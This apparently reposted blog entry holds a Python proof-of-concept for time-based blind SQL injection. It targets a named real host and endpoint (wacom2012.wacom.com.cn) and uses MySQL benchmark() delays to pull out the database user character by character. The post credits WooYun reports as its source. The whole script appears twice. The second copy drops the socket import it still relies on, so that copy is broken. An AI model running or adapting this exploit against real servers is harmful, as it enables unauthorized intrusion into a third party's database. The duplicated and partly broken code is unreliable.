SQL注入POC
2016-03-03 09:43
#encoding=utf-8
import random
import socket
import string
import sys
import time

try:
    import httplib
    import urllib
except ImportError:  # Python 3 spellings of the same two modules
    import http.client as httplib
    import urllib.parse as urllib
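# Candidate characters tried at every position. user() is lower()-ed on the
# server, so uppercase never matches; '%' and '-' are added because MySQL
# account hosts such as root@10.0.0.% or app@db-host contain them.
CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789@_.%-'
# Host and URL template taken from the WooYun report this POC was published
# with. Only run this against a system you are authorized to test.
TARGET_HOST = 'wacom2012.wacom.com.cn'
TARGET_PATH = '/AjaxRequest/Ajax_Page.aspx?id=%s&method=getregprocity'
# Responses slower than this are taken as "benchmark() ran", i.e. the injected
# condition was true. If the target's normal latency gets anywhere near it,
# raise it (or measure a baseline first) to avoid false positives.
DELAY_THRESHOLD = 2.0
REQUEST_TIMEOUT = 30
MAX_USER_LEN = 19  # the original script scanned positions 1..19
UNKNOWN_CHAR = '?'  # recorded when no CHARSET member matches a position

headers = {
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(CHARSET)  # kept under its original name for compatibility


def build_condition(position, char):
    """Return the MySQL predicate "character *position* (1-based) of lower(user()) is *char*"."""
    return "ascii(mid(lower(user()),%d,1))=%d" % (position, ord(char))


def build_end_condition(position):
    """Return the MySQL predicate that holds once *position* lies past the end of user()."""
    return "length(user())<%d" % position


def build_payload(condition):
    """Wrap *condition* so the server only burns CPU in benchmark() when it holds."""
    return "if(%s,benchmark(2000000,md5(1)),0)" % condition


def time_request(host, path, timeout=REQUEST_TIMEOUT):
    """Send one GET for *path* to *host* and return seconds until the response headers arrive.

    The clock starts before the request is written so no server-side time is
    missed. A socket timeout is reported as *timeout* seconds: the injected
    delay simply outlasted our patience, which is still a "true" answer, not
    an error. Other socket errors propagate; swallowing them would silently
    corrupt the extracted string. The connection is closed on every path.
    """
    conn = httplib.HTTPConnection(host, timeout=timeout)
    start = time.time()
    try:
        conn.request(method='GET', url=path, headers=headers)
        conn.getresponse()
    except socket.timeout:
        return float(timeout)
    finally:
        conn.close()
    return time.time() - start


def make_probe(host=TARGET_HOST, path_template=TARGET_PATH, timeout=REQUEST_TIMEOUT):
    """Return probe(payload) -> elapsed seconds, URL-encoding *payload* into *path_template*."""
    def probe(payload):
        return time_request(host, path_template % urllib.quote(payload), timeout)
    return probe


def extract_mysql_user(probe=None, max_len=MAX_USER_LEN, charset=CHARSET,
                       threshold=DELAY_THRESHOLD, confirm=True, out=None):
    """Recover lower(user()) one character at a time by time-based blind injection.

    probe: callable(payload) -> seconds; defaults to HTTP requests against
        TARGET_HOST. Passing a stub makes the loop testable offline.
    max_len: highest 1-based position probed.
    charset: candidates tried per position, in order.
    threshold: elapsed seconds above which an answer counts as "true".
    confirm: re-probe a hit once before accepting it, so one slow response
        caused by network jitter rather than benchmark() does not insert a
        wrong character. Costs one extra request per accepted character.
    out: file-like object for progress output; defaults to sys.stdout.

    Returns the recovered string. Each position is first checked against the
    end of user() so extraction stops as soon as the string is exhausted
    instead of probing every remaining position. A position where nothing in
    *charset* matches is recorded as UNKNOWN_CHAR so later characters stay
    aligned rather than being silently dropped.
    """
    if probe is None:
        probe = make_probe()
    if out is None:
        out = sys.stdout

    def is_true(condition):
        payload = build_payload(condition)
        if probe(payload) <= threshold:
            return False
        return (not confirm) or probe(payload) > threshold

    user = ''
    for position in range(1, max_len + 1):
        if is_true(build_end_condition(position)):
            break
        for char in charset:
            out.write('.')
            out.flush()
            if is_true(build_condition(position, char)):
                user += char
                break
        else:
            user += UNKNOWN_CHAR
        out.write('\n[In progress] %s' % user)
        out.flush()
    return user


if __name__ == '__main__':
    sys.stdout.write('start to retrive MySQL user:\n')
    result = extract_mysql_user()
    sys.stdout.write('\n[Done]MySQL user is %s\n' % result)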
Source: http://wooyun.org/bugs/wooyun-2010-0170936 and http://zone.wooyun.org/content/25653
import httplib
import time
import string
import sys
import random
import urllib
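# Candidate characters tried at every position. user() is lower()-ed on the
# server, so uppercase never matches; '%' and '-' are added because MySQL
# account hosts such as root@10.0.0.% or app@db-host contain them.
CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789@_.%-'
# Host and URL template taken from the WooYun report this POC was published
# with. Only run this against a system you are authorized to test.
TARGET_HOST = 'wacom2012.wacom.com.cn'
TARGET_PATH = '/AjaxRequest/Ajax_Page.aspx?id=%s&method=getregprocity'
# Responses slower than this are taken as "benchmark() ran", i.e. the injected
# condition was true. If the target's normal latency gets anywhere near it,
# raise it (or measure a baseline first) to avoid false positives.
DELAY_THRESHOLD = 2.0
REQUEST_TIMEOUT = 30
MAX_USER_LEN = 19  # the original script scanned positions 1..19
UNKNOWN_CHAR = '?'  # recorded when no CHARSET member matches a position

headers = {
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(CHARSET)  # kept under its original name for compatibility


def build_condition(position, char):
    """Return the MySQL predicate "character *position* (1-based) of lower(user()) is *char*"."""
    return "ascii(mid(lower(user()),%d,1))=%d" % (position, ord(char))


def build_end_condition(position):
    """Return the MySQL predicate that holds once *position* lies past the end of user()."""
    return "length(user())<%d" % position


def build_payload(condition):
    """Wrap *condition* so the server only burns CPU in benchmark() when it holds."""
    return "if(%s,benchmark(2000000,md5(1)),0)" % condition


def time_request(host, path, timeout=REQUEST_TIMEOUT):
    """Send one GET for *path* to *host* and return seconds until the response headers arrive.

    The clock starts before the request is written so no server-side time is
    missed. A socket timeout is reported as *timeout* seconds: the injected
    delay simply outlasted our patience, which is still a "true" answer, not
    an error. Other socket errors propagate; swallowing them would silently
    corrupt the extracted string. The connection is closed on every path.
    """
    conn = httplib.HTTPConnection(host, timeout=timeout)
    start = time.time()
    try:
        conn.request(method='GET', url=path, headers=headers)
        conn.getresponse()
    except socket.timeout:
        return float(timeout)
    finally:
        conn.close()
    return time.time() - start


def make_probe(host=TARGET_HOST, path_template=TARGET_PATH, timeout=REQUEST_TIMEOUT):
    """Return probe(payload) -> elapsed seconds, URL-encoding *payload* into *path_template*."""
    def probe(payload):
        return time_request(host, path_template % urllib.quote(payload), timeout)
    return probe


def extract_mysql_user(probe=None, max_len=MAX_USER_LEN, charset=CHARSET,
                       threshold=DELAY_THRESHOLD, confirm=True, out=None):
    """Recover lower(user()) one character at a time by time-based blind injection.

    probe: callable(payload) -> seconds; defaults to HTTP requests against
        TARGET_HOST. Passing a stub makes the loop testable offline.
    max_len: highest 1-based position probed.
    charset: candidates tried per position, in order.
    threshold: elapsed seconds above which an answer counts as "true".
    confirm: re-probe a hit once before accepting it, so one slow response
        caused by network jitter rather than benchmark() does not insert a
        wrong character. Costs one extra request per accepted character.
    out: file-like object for progress output; defaults to sys.stdout.

    Returns the recovered string. Each position is first checked against the
    end of user() so extraction stops as soon as the string is exhausted
    instead of probing every remaining position. A position where nothing in
    *charset* matches is recorded as UNKNOWN_CHAR so later characters stay
    aligned rather than being silently dropped.
    """
    if probe is None:
        probe = make_probe()
    if out is None:
        out = sys.stdout

    def is_true(condition):
        payload = build_payload(condition)
        if probe(payload) <= threshold:
            return False
        return (not confirm) or probe(payload) > threshold

    user = ''
    for position in range(1, max_len + 1):
        if is_true(build_end_condition(position)):
            break
        for char in charset:
            out.write('.')
            out.flush()
            if is_true(build_condition(position, char)):
                user += char
                break
        else:
            user += UNKNOWN_CHAR
        out.write('\n[In progress] %s' % user)
        out.flush()
    return user


if __name__ == '__main__':
    sys.stdout.write('start to retrive MySQL user:\n')
    result = extract_mysql_user()
    sys.stdout.write('\n[Done]MySQL user is %s\n' % result)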
Source: http://wooyun.org/bugs/wooyun-2010-0170936 and http://zone.wooyun.org/content/25653